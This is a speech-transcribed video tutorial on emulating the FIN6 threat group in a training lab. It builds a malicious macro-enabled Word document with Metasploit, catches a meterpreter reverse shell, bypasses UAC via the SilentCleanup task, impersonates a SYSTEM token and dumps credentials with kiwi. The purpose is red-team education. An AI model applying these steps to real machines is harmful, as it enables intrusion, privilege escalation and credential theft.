Emulating FIN6 - Gaining Initial Access (Office Word Macro)

hey guys hack exploit here back again with another video Welcome Back to the adversary emulation Series where we'll be exploring the process of emulating and or simulating the tradecraft and ttps of real world threat actors in AP groups in this video we're going to be focusing on Finn 6 uh you know Finn six is a financially motivated threat actor known for its sophisticated tactics and our primary objective in this video is to emulate uh to begin with the initial access um techniques uh that we essentially outlined in the emulation plan in the previous video so if you're getting to this video um without watching or you know this is your first time watching one of the um adversary emulation videos I would highly recommend you take a look at the previous video where we sort of outlin the emulation plan but the objective here is uh to focus primarily on initial access via a spear fishing attachment so um it's not really important that uh we have um you know we're not going to be focusing primarily on the actual delivery of the document and stuff like this um I'll speak on um I I'll speak on some of the other techniques that we can sort of adapt or some of the ttps we can adapt as we proceed uh but the objective here as I said is to emulate initial access via spear fishing attachment so we're primarily going to focus on um the fundamentals to get things going and then um as we progress uh even in the next video I'll probably make um I'll probably make a video on how to develop your own VBA macros or you know your spear fishing documents let's say um from scratch so once we um achieve initial access we're going to move into local privilege escalation and uh I'll sort of explain um if you have gone through the lab uh that I mentioned in the previous video uh you may not have seen a section on local privilege escalation but um that's what I'll be walking through as well uh and all of this will set the stage for the next phase um of you know finix emulation um which will be active directory enumeration and then we'll cover um you know active directory or directory privilege escalation in another video and then finally we'll have a final video which will be exfiltration so I'm covering it in I'm covering each of the phases um or each section of the attack life cycle in its own video to again make these shorter and much easier to consume so uh just to reiterate one more time for the purpose of this video we'll be follow following the emulation plan and will automate the development of the macro enabled document with Metasploit however in the next video so the video after this one um I'll pretty much cover the process of how to develop your own VBA macros for initial access so for any of you who were wondering whether I was going to uh cover this in detail I will the idea is to you know firstly get you going um and then we can explore some of these uh techniques or sub techniques uh in Greater detail which is you know exactly my goal so uh don't worry if that was one of uh you know the things you're looking forward to we will get to that um and then once we've covered that we'll then move on to the active directory side of things so uh before we get started I just want to revisit the emulation plan so uh link to this will be in the description section we outlined it in the previous video uh but on the center for threat informed defense adversary emulation Library uh GitHub repo you can see I'm currently the fin six folder and this is the emulation plan that we'll be utilizing or the lab on Cyber rang's um utilizers I should say and we are primarily interested in Phase One and this is what we're emulating to begin with so this plan really doesn't focus on um initial AIS uh but just you know outlines the two primary uh initial um the two primary initial axis vectors or techniques if you will that finix has been known to use and if we take a look at the ttps on the attack uh Navigator you can see that their primary uh initial axess techniques revolve around valid accounts um but these also um you know come in handy or have come in handy for finix uh when performing lateral movement but you can see the primary ones are spe you know utilizing a spear fishing attachment Etc uh given that we'll also be you know once we have gained initial access we're essentially you know in the realm of execution or

when whenever we enter or type in a command uh that's considered execution we need to also understand what command and scripting interpreter finix has been known to use now finix given the choice of tools has utilized Cobalt strike metlo meterpreter but primarily they uh utilize um you know the Windows command shell although not that much but I think um you know if you to look at it or if you to analyze a lot of their campaign you can see there's a lot of use of Powershell so we'll also be doing that or facilitating that through meterpreter so hopefully that makes sense now um again if this is your first time watching this series we are going through these um you know these emulation videos if you will or these emulation um exercises using a set of pre-built Labs that are you know absolutely free to access that I actually built uh these um of course were based on um these were based on an adverse ulation Labs that were posted on GitHub by the might enginuity team again reference or info on that is in the uh previous video in any case I'm not going to waste more time um a link to the playlist on Cyber ranges is in the description section and we're going to be utilizing lab 1. 3 if you're new to cyber ranges again you can just visit app. cyber rangers. com uh registering for an account is free again link will be in the description you can head over to the community section once you've created your account and you want to look for this playlist of labs here uh it's the might attack Defender adverse ulation fundamentals uh playlist uh we already went through lab 1. 1 in the previous video so now it's 1. 3 and I'm just going to go ahead and start it I believe I had my lab um already good to go um this lab uh pretty much has uh whatever we are going to be covering documented so you know pretty much uh whatever commands or the phases that we'll go through however as I said there's going to be a slight deviation because um within the lab documentation it highlights um you know when you're sort of emulating or simulating a victim um downloading and opening the document you can see that the U the official documentation tells you to run word as administrator which we're not going to do uh because in the case of this lab or you know this specific uh walkth through documentation skips local privilege escalation which I think is not that realistic so I'm actually going to include that in my demo in any case you have the walkth through here in the overview um so you can always refer back to this and if you want to access any of the systems we have a c Linux system that's you know good to go this is the IP within the lab environment the you can access it uh in your browser via RDP uh these are the credentials uh for the Cali Linux system and then for the um domain controller here that's running I think Windows Server 2016 or something or 2019 it could be although we'll have to find out you can see the credentials here so uh these can both be accessed uh you know directly in your browser without any issues um so when you open it up uh you'll have the guacamole dashboard where you can then open up your Cali Linux system like so and we'll start off here and um this uh should be fairly simple this demo will not be that complex now on your Cali Linux system um specifically for this lab as well as the other labs within the playlist um there's going to be an adversary emulation folder uh found within the home directory of the attacker user and this uh contains um a folder called labs and uh you know the setup scripts but you know it's recommended to go through these and and uh you know essentially work from um or set your working directory to the lab that you're currently working on just to organize things so uh what I'll do here is I'll open up my terminal and um I will just uh increase the font size so you guys can see this a little bit better uh probably smarter to open up uh make this full screen I don't know whether Firefox will um allow me to refresh this let's go ahead and check this now or to essentially extend there we are so um there we go so we have calii uh you know up and running so I'll Now navigate into the adversary emulation folder I'll just say labs and then lab um 1. 3 that's the one we're currently working in all right so now that we um now that we're within our working folder I'm just going to open up uh msf console we don't really need the database um if

you want to you can um but uh yeah so uh another thing to point out is that uh this particular lab um you know if I'm just to um exit full screen here this specific lab actually covers all the techniques um you know ranging from initial access all the way to ad uh enumeration so do keep that in mind we're just focusing on initial access first and then uh you can go through the rest of the steps but uh there's a couple of important stuff that I think you should wait for uh if you want to but uh in any case there we are so in order to um you know simulate the creation of um our malicious attachment we are going to leverage a fairly useful although not that effective module uh just you know for so that we can establish initial access uh we're going to utilize the uh word macro uh module so I'm going to just uh search for uh word macro something like this and that's the one here so exploit it's an exploit module so Office Word macro um Microsoft Office Word malicious macro execution so I'll just say use specifying the IDE of the module I'm going to set the payload to um windows x64 so 64-bit meterpreter payload um and then we are just going to uh reverse we can use uh TCP like so and now I'll just say show options so the lhost is already set to the IP address of the C Linux system we'll set uh will not change the exit function from thread and that's actually a good thing especially on Modern uh versions of Windows um and you know I'll I think I can explain that now so uh the exit function um option in Metasploit it's uh specifically relevant when you are configuring your payload really Windows payloads to be honest although you might see them with Linux but uh this option essentially allows you to specify how the payload will handle the process termination after the exploit is executed successfully so it pretty much determines the mechanism that the payload will use to exit cleanly from the exploited process right and this is important because improper termination can crash the target application right um you know potentially alerting the user or Defender so in this case because the target uh or the victim who we're going to assume is running on uh the Windows system you know is going to open up a Word document if we went for let's say um the process option uh what this does when you configure it as such is it terminates the entire process in which the exploit is running so given that the macro will be executed by word um within the word process um if you will um if we utilize the process exit function uh then you know once it's done it'll pretty much give us some interpreter session but then it'll terminate word which is something we don't want you know both from a um convenience perspective but also from a um a general upset perspective you don't want the target to know that there's something iffy or something wrong with the document that they've just opened right um the thread option is um really um it's actually the recommended when you know targeting Windows application so something like word if you will and it's very useful if you want the application that you're targeting to remain operational or exit gracefully without triggering alerts so the way thread works is that it ends the thread that the payload is running in leaving the rest of the application so um you know in this case Word Microsoft Word running and does not ter the entire process only the specific thread spawned for the exploit and then of course you have SE which I'll just explain really quickly if you're not familiar with SE stands for the struct you know structured exception handling so um this utilizes SE when you select that option it utilizes SE to gracefully terminate the exploited process and it goes without saying that uh SE is a Windows specific mechanism that allows for handling exceptions or errors if you will um during program execution so in our case we'll just go For Thread um this module requires um a file name if you want to you can see it's going to utilize the doc M uh extension which is um you know an alias for or you know pretty much just tells you that this is a macro enabled document in the next video I'll explain how you can you know utilize um ActiveX and stuff to um to actually uh utilize the well I wouldn't say do X but let's say a doc um

for example and you can specify a custom template a docx template that uh is actually very useful uh so if you have a custom dockx template that's part of your fishing or your spear fishing attempt you can actually specify the path to the file in our case we'll just go for the defaults and we'll just hit exploit to generate it so it's going to generate it using the default template that's under user share met exploit uh framework data exploits Office Word macro template. docx um and you can actually see uh there we are it's saved under root msf 4 local msf. docm so I'm just going to copy the path to that file and I'll open up a new tab and I'll just navigate to adversary emulation um labs and lab 1. 3 just so that I'm working within the appropriate folder it's not required but organization is very useful I'll then say pseudo copy U yeah we don't really need to move it given that this is not my Cali Linux system so we can just copy it there we go and uh now we have that running um before we actually transfer it to the Target system or we sort of simulate um a fishing attempt which will essentially involve us somehow transferring the document to the Windows system and then we're going to simulate the use opening the document um but yeah so in order for us to actually receive The Interpreter session we're going to say uh we're going to utilize the exploit uh multi- Handler so exploit multi- Handler and uh we're going to set the payload to Windows um x64 interpreter reverse TCP and then for the options here um we're going to set the L host to the C Linux IP which will be the same for you given that these IPS are static um and then we need to change the exit function to thread this is very important otherwise the word will pretty much terminate once the payload is executed so we're going to say set um exit function um exit function uh we're going to send that to thread CU that's what we had used when generating the document as well um and we'll just use Lort you know the option we used when generating the document and then now we can just hit exploit or run and have we have our Handler running so to transfer it to the Target um I'm just going to set up a very simple web server uh with python uh the Python 3 module HTTP do server so I'm just going to say Pudo Python 3 module HTTP do server port 8080 and uh we're going to host it so now we can switch over into the um Windows system so I'll just open up that system V RDP so we're now simulating you know the actual uh process of um you know the user uh downloading the document somehow um and then um opening it up right so we'll just say uh put in the password there for the user mad admin and again I know this is not proper fishing or proper emulation but this emulation plan was really designed to be more focused on the post compromise phase but I thought it would be a good idea to actually go through this in any case um we can utilize Powershell here of course in a normal instances the user would um ideally you know download it or get it from an email uh but in our case we're sort of simulating this I'll just navigate to the desktop so we have uh we can download it there and then we can utilize pow shell to say invoke um we can use uh web request so invoke web request and I'll just increase the font size here so that's clear for you guys cuz I know sometimes this can be a little bit difficult to read uh there we are and then we just say uh URI um the IP address of the web server hosting the document which in this case is going to be the Cali Linux system so 192 1681 125 103 and I believe we ran the web server on port 8080 the name of the file is just msf. docm um and then we'll specify the out file name as um we'll save it under C uh users the name of this user is mad admin and uh desktop and uh we'll just say msf. docm like so hit enter that looks like it's done and again now this is where we'll deviate from what's in the actual lab documentation and uh we're not going to run um word as admin cuz no one

ever does that so we're just going to open up the document now if you get an activation error don't worry that's um that's not going to affect the lab or anything or any you know this particular demo uh but we're going to give word a couple of seconds to start up it may take a minute who knows with word um all right so yeah I'm just going to wait for this to open up I don't want to skip through uh there we go okay so uh users view only the micro will still work uh next don't send optional data done and uh there we are so this is the template that metlo uses or that module uses so you can see fairly convincing that this document is essentially telling the US that this document was created by a new a newer version of Microsoft Office and macros must be enabled so let's go ahead and be or play the part of the stupid user and for some reason um I don't know this is very strange there we are so looks like it executed so now um how do I exit oh yeah I'm inan full screen um so I'll go back into the Cali Linux system the macro executed um you can see we get a get request here on our well that was CU we downloaded it but here we have The Interpreter session so the stage is sent and we have session one so first things first let's learn a little bit about our system um we can see the computer host name is Target DC 64bit we also have a 64-bit interpreter session logged on users 13 that's very strange um I'm just going to migrate my process to um to Explorer so I'm just going to search for the process ID for explorer. exe and then migrate to um 49 92 like so and uh there we are that should be that should work without any issues so there we are uh get us ID you can see mad uh mad admin and uh in this particular case now um if I say get uh prives to essentially view whether we are elevated you can see we are not cuz the privilege uh set that we have is again not um indic ative of us being um an elevated user or a user with an elevated context so uh we'll open up a shell session command shell session we'll say net user so we can see there's an administrator mad admin which is who we are there's also admin uh krbtgt um but if I say uh well actually at this point we would not need to do any crazy enumeration we can just try and say uh we can confirm the privilege set so where am I uh priv like so yeah that's correct um if I now say uh net local group just to check if this user is part of the local administrators group local group administrators we can see that mad admin is indeed part of this group so while we are not elevated we can leverage a technique like you know bypassing UAC uh to Elevate our privileges uh fairly easily um and that shouldn't take too much time at all so in this particular case um yeah uh if I just uh terminate this particular Channel and uh let me go ahead and um I put this in the background so you know for example if I say um load uh kiwi just to show you this uh load kiwi um and then we can just say creds all just to show you that we're not elevated so there we are not running a system I think I can also try and load Incognito to see whether we have any tokens we can impersonate so I can say list tokens um we just use the user tokens so there we are there's just the delegation tokens for the user mad admin um so you know we don't we can't really do much on that front um in any case uh what we can try and do now is uh just put this in the background and we can search for bypass UAC and uh the module that operates uh best for Windows server is the silent cleanup module if I can find it somewhere here I believe this is the one here so there we are so we'll just say uh use 9 and uh there we are

9 and uh we'll just say uh there we are so we can actually set our payload to Windows now we need we might need to play around with this but we just say windows um x64 interpreter reverse um TCP uh show options and um in this case uh do we need to change the exit no I don't thing we do so L Port 5555 um let's just change it for organization we want to set the session ID so set session um to one and uh the partial path that's very important but yeah this is always a good module cuz uh this path is always or you know partial vew one is uh is always going to be there um if I say show info if you want to learn more about this so there's a task in the Windows task scheduler called Silent cleanup which while it's executed as users automatically runs with elevated privileges when it runs it executes the file uh you know wind directory um or whatever that is called uh system 32 clean manager. exe since it runs as users and we can control the users environment variables when the window uh variable here or path if you will normally pointing to C windows can be changed to point wherever we want and it'll run as admin so um yeah and uh we can set the sleep time uh but it does actually perform clean up I believe so in any case we can uh try it out let's see if it actually works so yeah we are part of the administrators group and it's going to send the stage um this is taking a bit more time so we probably want to use um you know different payload or even a unstaged payload cuz um these can be quite tricky um and we're just going to wait and see whether we get anything I doubt we'll get any prompt cuz this is a silent technique so we shouldn't get any UAC prompt here uh what am I doing weird always switching back in any case uh let me go back I'm in an operating system within an operating system so multiple layers of abstraction anyway I'm not sure this is working uh oh it looks like we did get it so yeah that's SP 5555 so let's try and see whether this worked so get use ID we uh we should still be mad admin however if I now say get prives we should have the elevated privilege set so you can see pretty much everything you would expect here and uh now if I say load uh kiwi or something like this um and I say um if I say ceds all there we go um okay so that's not an issue uh that's primarily the meterpreter session so yeah we can now impersonate NTI Authority and that will update the context from interpreter so we can now say um personate uh token and um again if you're not familiar with this it really is very simple uh we just specify the name of the token we want to impersonate so there we are now we say get user ID there we are and then I can now say creds um all like so and uh that now works and then uh yeah so that's uh pretty much it and now uh final thing in this video um that I wanted to cover was of course the command and scripting interpreters so as I mentioned earlier on in this video the um the most common um you know command and scripting interpreter that um fin6 has been known to use as partial luckily for us um you know metet as an inbuilt power shell interpreter so I can say load power shell and then we can utilize power shell uh shell and this is what we primarily be using so this is much more stable than the command shell which as you know can be quite tricky but uh that is pretty much all that I wanted to cover in this video already I think it's about 30 minutes so uh I think it was a good idea in any case um that's going to be it for this video now um in the next video we are going to be uh you know taking a look at how

to generate your own macro uh macro enabl document how to craft or weaponize macro uh VBA macros in essence you'll be able to create your own Word document macro enabled Word document uh that will give you a reverse shell but the bottom line is you you'll actually create the actual VBA code uh yourself so that's the objective for the next video and then after that we'll resume with uh this lab and we'll then uh you know move on to active directory enumeration and sort of uh staging the files um all the information that we're gathering for exfiltration so uh with that being said you know that brings us to the end of this video um if you enjoyed this video found value in it leave a like as you know it really does help in getting this video as well as other videos out to more people and uh you know just improves its visibility in the algorithm or helps boost the visibility of the video um if you have any questions or feedback feel free to leave a comment down below furthermore and this is very important if you have any video ideas or topics that you'd like me to cover uh please take a look at the content suggestions form um in the description section it's a very simple Google form that allows you to submit your suggestions and it's based on that I'm actually going to cover you know someone requested me the pro of actually develop veloping your own uh macros so you can see that I'm going to take your feedback quite seriously um and then you know the final thing I just want to say is you can um if this is your first time um you know interacting with the Cyber Rangers platform do take a look at the adversary emulation playlist as well as the other free ones um that there's another playlist that I developed on uh you know red team tradecraft so you know you can also check some of the previous videos anyway thank you very much for watching guys and with that being said I'll be seeing you guys in the next video